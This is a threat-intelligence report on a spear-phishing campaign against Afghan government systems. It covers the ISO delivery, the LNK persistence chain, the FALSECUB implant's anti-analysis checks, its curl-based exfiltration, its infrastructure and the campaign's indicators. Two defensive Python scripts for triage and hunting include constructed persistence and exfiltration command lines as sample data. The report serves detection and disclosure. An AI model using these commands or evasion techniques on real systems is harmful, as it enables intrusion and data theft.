Operation Nomad Leopard: Spear-Phishing Campaign Targets Afghan Government Systems with Stealthy ISO-Based Malware

A security research team published an analysis of an ongoing targeted spear-phishing campaign, Operation Nomad Leopard, designed to infiltrate government computers within Afghanistan. The operation leverages bespoke social-engineering techniques, ISO-container evasion, and a multi-stage malware chain to achieve initial access, persistence, and data exfiltration.


Campaign Overview

Operation Nomad Leopard is a regionally focused cyber-espionage operation directed at Afghan government ministries and administrative offices. The attackers use highly plausible decoy content and tailored social engineering to lure victims into executing malicious files.

Key characteristics include:

  • Targets: Government ministry and administrative personnel in Afghanistan
  • Primary vector: Spear-phishing with a malicious ISO file attachment
  • Threat level: Targeted and persistent, though exhibiting operational mistakes
  • Attribution: Individual or small cluster actor with regional interest and limited operational security (opsec) maturity

Infection Chain Breakdown

The core of this operation is a multi-stage infection chain that uses legitimate formats and tools to evade detection by security systems.

1. Initial Access: Malicious ISO Delivery

The attack begins when a target receives a file named Afghanistan Islami Emirates.iso. ISO is a disk-image format that Windows mounts as a virtual drive, and files launched from inside the mounted image do not inherit the Mark-of-the-Web flag that a downloaded file carries, so they sidestep the warnings and scanning that email and endpoint filters apply to flagged content.

Upon extraction, the ISO contains three files:

  • doc.pdf: A decoy document designed to mimic an official Afghan government communication
  • Doc.pdf.lnk: A malicious Windows shortcut that drives execution logic
  • img.jpg: The final payload, disguised as an image but in reality a Windows executable

Decoy Document: Authenticity in Deception

The decoy doc.pdf is carefully crafted to resemble an authentic government notice. It is written in Pashto, carries official formatting, logos and reference numbers, and includes instructions that create urgency, pressuring recipients to interact with the file.

This psychological manipulation increases the chance of user execution, exemplifying how threat actors combine technical and social tactics.


Stage 2: The Malicious LNK File

The Doc.pdf.lnk file is not just a shortcut to open the PDF. It follows a precise workflow:

  1. Launch the decoy PDF so the victim sees a legitimate document.
  2. Copy the hidden payload (img.jpg) to the system directory at C:\ProgramData\.
  3. Create persistence by using the mklink command to hardlink the payload into the Windows Startup folder as searchmgr.exe.
  4. Execute the implant using a silent start command.

By executing these steps, the LNK file achieves both stealthy execution and persistence across reboots, the two ingredients of long-term access.


Stage 3: The FALSECUB Implant

The executable hidden as img.jpg is a bespoke implant that SEQRITE tracks as FALSECUB.

Technical Features of FALSECUB

  • Compiled in C++ with anti-analysis measures
  • Anti-debugging and anti-sandbox checks, including:
    • GetTickCount64 to detect timing anomalies introduced by a debugger or instrumented sandbox
    • GlobalMemoryStatusEx to check installed physical memory, since analysis VMs are often provisioned with little RAM
    • IsDebuggerPresent to detect an attached debugger

These routines hinder debugging and let the implant recognise, and stay dormant in, automated sandbox environments.
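The file-level tells described in the LNK and FALSECUB sections (a double-extension shortcut, an executable hidden behind an image extension, a shortcut that stages a hard link into the Startup folder, and a binary that names anti-debugging APIs) can be checked mechanically during triage. The Python script below is an added example, not part of the original report or SEQRITE's tooling. It builds a constructed, illustrative copy of the ISO layout in a temporary directory, so the file contents, the shortcut's command string and the Startup-folder path are assumptions, not the real samples. It deliberately keys on file content and naming rather than on the Mark-of-the-Web flag, which may or may not be present depending on how the image was mounted and the Windows patch level.

```python
"""Triage helper for an extracted ISO (added example; constructed data only)."""
import os
import re
import tempfile

PE_MAGIC = b"MZ"
IMAGE_EXTS = {".jpg", ".jpeg", ".png", ".gif", ".bmp"}
DOC_EXTS = {".pdf", ".doc", ".docx", ".xls", ".xlsx", ".txt"}
# Fragments of the LNK workflow described in the report: staging under
# ProgramData and a mklink hard link into the Startup folder.
LNK_SUSPECT = re.compile(r"mklink|programdata|startup", re.I)
# APIs the report names as FALSECUB's anti-analysis checks.
ANTI_DEBUG_APIS = (b"IsDebuggerPresent", b"GetTickCount64", b"GlobalMemoryStatusEx")


def _printable_views(data):
    """Shortcut strings are stored as UTF-16LE, so inspect both decodings."""
    return data.decode("latin-1") + "\n" + data.decode("utf-16-le", errors="ignore")


def classify_file(path):
    """Return the list of findings for one extracted file (empty if clean)."""
    findings = []
    lower = os.path.basename(path).lower()
    with open(path, "rb") as fh:
        data = fh.read()
    if lower.endswith(".lnk"):
        # Double extension: Doc.pdf.lnk presents as a document but is a shortcut.
        if os.path.splitext(lower[:-4])[1] in DOC_EXTS:
            findings.append("double-extension shortcut")
        if LNK_SUSPECT.search(_printable_views(data)):
            findings.append("shortcut references staging/persistence commands")
    ext = os.path.splitext(lower)[1]
    if ext in IMAGE_EXTS and data.startswith(PE_MAGIC):
        findings.append("PE executable disguised as image")
    if data.startswith(PE_MAGIC):
        hits = [api.decode() for api in ANTI_DEBUG_APIS if api in data]
        if hits:
            findings.append("anti-debug APIs: " + ", ".join(hits))
    return findings


def triage_iso_contents(directory):
    """Map file name -> findings for every flagged file under the directory."""
    report = {}
    for root, _dirs, files in os.walk(directory):
        for name in files:
            findings = classify_file(os.path.join(root, name))
            if findings:
                report[name] = findings
    return report


def hardlinked_startup_entries(startup_dir):
    """Names of Startup-folder files with a link count above 1: mklink /H leaves
    the payload reachable from two paths, which a plain copy would not."""
    out = []
    for name in os.listdir(startup_dir):
        path = os.path.join(startup_dir, name)
        if os.path.isfile(path) and os.stat(path).st_nlink > 1:
            out.append(name)
    return sorted(out)


def build_sample_tree():
    """Construct an illustrative ISO layout and a fake Startup folder.
    Contents are placeholders, not the real campaign files."""
    base = tempfile.mkdtemp(prefix="nomad_leopard_demo_")
    iso = os.path.join(base, "iso")
    startup = os.path.join(base, "startup")
    os.makedirs(iso)
    os.makedirs(startup)
    with open(os.path.join(iso, "doc.pdf"), "wb") as fh:
        fh.write(b"%PDF-1.4\n% decoy placeholder\n")
    # Real shortcuts store their argument string as UTF-16LE; the command
    # below is a constructed stand-in for the staging/persistence steps.
    cmd = "cmd /c copy img.jpg C:\\ProgramData\\ & mklink /H Startup\\searchmgr.exe C:\\ProgramData\\img.jpg"
    with open(os.path.join(iso, "Doc.pdf.lnk"), "wb") as fh:
        fh.write(b"L\x00\x00\x00" + cmd.encode("utf-16-le"))  # 0x4C header-size prefix
    with open(os.path.join(iso, "img.jpg"), "wb") as fh:
        fh.write(b"MZ\x90\x00" + b"\x00" * 60 + b"IsDebuggerPresent\x00GetTickCount64\x00")
    payload = os.path.join(base, "payload.bin")
    with open(payload, "wb") as fh:
        fh.write(b"MZ")
    os.link(payload, os.path.join(startup, "searchmgr.exe"))  # hard link, as mklink /H would create
    return iso, startup


if __name__ == "__main__":
    iso_dir, startup_dir = build_sample_tree()
    for name, findings in triage_iso_contents(iso_dir).items():
        print(name, "->", "; ".join(findings))
    print("hard-linked Startup entries:", hardlinked_startup_entries(startup_dir))
```

Point triage_iso_contents at a directory holding a mounted or extracted ISO and hardlinked_startup_entries at a user's Startup folder; on a real host the link-count check needs an NTFS volume, and the API-name scan is a quick triage signal only, since a packed binary hides its imports until unpacked.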

Command & Control and Operations

Once initialized and past its anti-analysis checks, the implant attempts to connect to a hardcoded command-and-control (C2) address. Once connected, FALSECUB can receive commands that perform operations such as:

  • Enumerating the infected system (user, computer, OS version)
  • Enumerating connected drives
  • Exfiltrating data via HTTP to the C2 server
    • Uses a silent curl command with custom HTTP headers
    • Uploads files from user directories like Desktop and Documents
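The curl-based exfiltration above leaves a distinctive process-creation footprint: a silent curl invocation with custom headers, an upload switch, a path under a user's Desktop or Documents folder, and one of the campaign's network indicators. The Python detector below is an added example, not part of the original report. It scores constructed JSON process events; the field names image and cmdline are assumptions rather than any particular EDR's schema, and the sample command lines, header name and file paths are invented for illustration. Only the network indicators come from the report.

```python
"""Hunt for the curl-based exfiltration pattern in process events (added example)."""
import json
import re
import shlex

# Network indicators from the report, with the defanging brackets removed.
C2_INDICATORS = ("104.18.38.233", "207.244.230.94", "theepad0loc93x.ddns.net")
# A path inside a user's Desktop or Documents folder.
USER_DIR_RE = re.compile(r"\\Users\\[^\\]+\\(Desktop|Documents)\\", re.I)
# curl switches that send a local file or request body to the server.
UPLOAD_FLAGS = {"-F", "--form", "-T", "--upload-file", "-d", "--data", "--data-binary"}


def analyse_curl(cmdline):
    """Extract the tells from a curl command line; None if it is not curl."""
    try:
        argv = shlex.split(cmdline, posix=False)  # keep Windows backslashes intact
    except ValueError:
        return None
    if not argv:
        return None
    exe = argv[0].strip('"').lower()
    if not (exe == "curl" or exe.endswith("curl.exe") or exe.endswith("\\curl")):
        return None
    tokens = [t.strip('"') for t in argv[1:]]
    silent = any(
        t in ("-s", "--silent")
        or (t.startswith("-") and not t.startswith("--") and "s" in t[1:])  # e.g. -sS
        for t in tokens
    )
    headers = [tokens[i + 1] for i, t in enumerate(tokens[:-1]) if t in ("-H", "--header")]
    upload = any(t in UPLOAD_FLAGS for t in tokens)
    user_files = [t for t in tokens if USER_DIR_RE.search(t)]
    joined = " ".join(tokens).lower()
    ioc_hits = [ioc for ioc in C2_INDICATORS if ioc in joined]
    return {"silent": silent, "headers": headers, "upload": upload,
            "user_files": user_files, "ioc_hits": ioc_hits}


def score_event(event):
    """Score one process-creation event (dict with 'image' and 'cmdline' keys)."""
    tells = analyse_curl(event.get("cmdline", ""))
    if tells is None:
        return 0
    score = 0
    if tells["ioc_hits"]:
        score += 2  # known campaign indicator: strongest signal on its own
    if tells["upload"] and tells["user_files"]:
        score += 1  # sending documents out of the user profile
    if tells["silent"] and tells["headers"]:
        score += 1  # silent curl with custom headers, as the implant does
    return score


def hunt(log_lines, threshold=1):
    """Return [(score, cmdline)] for events at or above the threshold, highest first."""
    hits = []
    for line in log_lines:
        event = json.loads(line)
        score = score_event(event)
        if score >= threshold:
            hits.append((score, event["cmdline"]))
    return sorted(hits, reverse=True)


# Constructed process events (not real telemetry); field names are assumptions.
SAMPLE_LOG = [
    json.dumps({"image": r"C:\Windows\System32\curl.exe",
                "cmdline": r'curl.exe -s -H "X-Session: a1b2" '
                           r'-F "file=@C:\Users\karim\Documents\budget.xlsx" '
                           r'http://theepad0loc93x.ddns.net/'}),
    json.dumps({"image": r"C:\Windows\System32\curl.exe",
                "cmdline": r'curl.exe -sS -o C:\Temp\pkg.zip https://example.org/pkg.zip'}),
    json.dumps({"image": r"C:\Windows\System32\notepad.exe",
                "cmdline": r'notepad.exe C:\Users\karim\Desktop\notes.txt'}),
]

if __name__ == "__main__":
    for score, cmdline in hunt(SAMPLE_LOG):
        print(f"[{score}] {cmdline}")
```

The indicator match carries the most weight because it is the only unambiguous signal; the silent-plus-headers and upload-from-profile tells on their own are hunting leads that need review, since administrators also script curl. Feeding real Sysmon or EDR process events into hunt only requires mapping their command-line field onto cmdline.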

Infrastructure and Attribution

FALSECUB attempts connections to multiple endpoints:

  • IP 104[.]18[.]38[.]233 (Cloudflare)
  • IP 207[.]244[.]230[.]94 running RDP
  • Domain theepad0loc93x.ddns.net via dynamic DNS services

The malware infrastructure is hosted under ASN AS40021 (Contabo) and AS13335 (Cloudflare), indicating abuse of commodity cloud hosting and dynamic DNS for cheap, easily rotated infrastructure.

A GitHub repository (user afghanking777000) hosted the malicious ISO, an operational mistake by the actor: the account provided forensic clues about their activity patterns and interests, including posting real Afghan government documents. Content tied to this alias appeared linked to Pakistan via metadata and telemetry evidence, though attribution remains tentative.


Operational Security (OpSec) Observations

Despite careful lure design, the operator made several mistakes:

  • Use of a public GitHub repository as a dropper
  • Reuse of personas across platforms such as Pinterest and Scribd
  • Upload timelines that revealed behavioral patterns

These weaknesses suggest a low-sophistication threat actor or small group rather than a well-resourced state-level operation.


Conclusion

Operation Nomad Leopard demonstrates how targeted spear-phishing campaigns continue to evolve against government and strategic targets. The campaign combines:

  • Highly convincing social engineering
  • Evasion techniques via ISO containers
  • A multi-stage infection process
  • Custom malware with anti-analysis logic

Despite exhibiting moderate sophistication, operational mistakes gave defenders valuable forensic footholds. The campaign underscores the importance of layered defense, user education, and proactive threat hunting.


Technical Indicators (IOCs)

Hashes:

  • ISO: 63f6c85fc16b346cc3f18da9380aee6ffbb3e735863e2e8f118f38737e0d1345
  • LNK: 6c8936fea2fe9cbbcc6135941ac5fb6ea7819530a0914d8c0f39a015c0f2055d
  • EXE: f817f65edbc77f7bbdd6e4f469e82c0e770b7e221bdb348f366a475a8a39242b

Network:

  • 104[.]18[.]38[.]233
  • 207[.]244[.]230[.]94
  • theepad0loc93x[.]ddns[.]net
  • TinyURL redirect: hxxps://tinyurl[.]com/3hjb6f95